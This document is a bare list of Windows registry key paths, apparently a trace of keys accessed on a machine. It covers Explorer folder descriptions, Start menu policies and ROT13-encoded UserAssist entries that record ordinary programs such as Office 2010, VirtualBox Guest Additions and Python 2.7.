HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheTBP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary.Gnfxone
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IOBKJVAQBJFNQQVGVBAF-NZQ64.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\IObkQeiVafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\ertrqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\IOBKFIE\Qbjaybnqf\9.0_NqorEqe90_ra_HF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvrkrp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.JvaqbjfVafgnyyre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\CVY-1.1.7.jva32-cl2.7.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\wqx-7-jvaqbjf-v586.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\frghc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IObkJvaqbjfNqqvgvbaf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\HfreNppbhagPbagebyFrggvatf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erxrljvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zzp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\fyhv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\frgup.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FlfgrzCebcregvrfNqinaprq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\AQC451-XO2858728-k86-k64-NyyBF-RAH.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BHGYBBX.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\CBJRECAG.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BARABGR.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Ernqre 9.0\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\havafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Grzc\~afh.gzc\Nh_.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jvaire.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clgubaj.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7SR8Q22N-SO1Q-N8OR-01R3-6P8693961R6R}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.64Ovg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\Nhgbehaf64.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Jbeq 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Rkpry 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bhgybbx 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg CbjreCbvag 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg BarAbgr 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqbor Ernqre 9.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Benpyr IZ IveghnyObk Thrfg Nqqvgvbaf\Havafgnyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere (64-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CLASSES_ROOT\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong.pbz.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
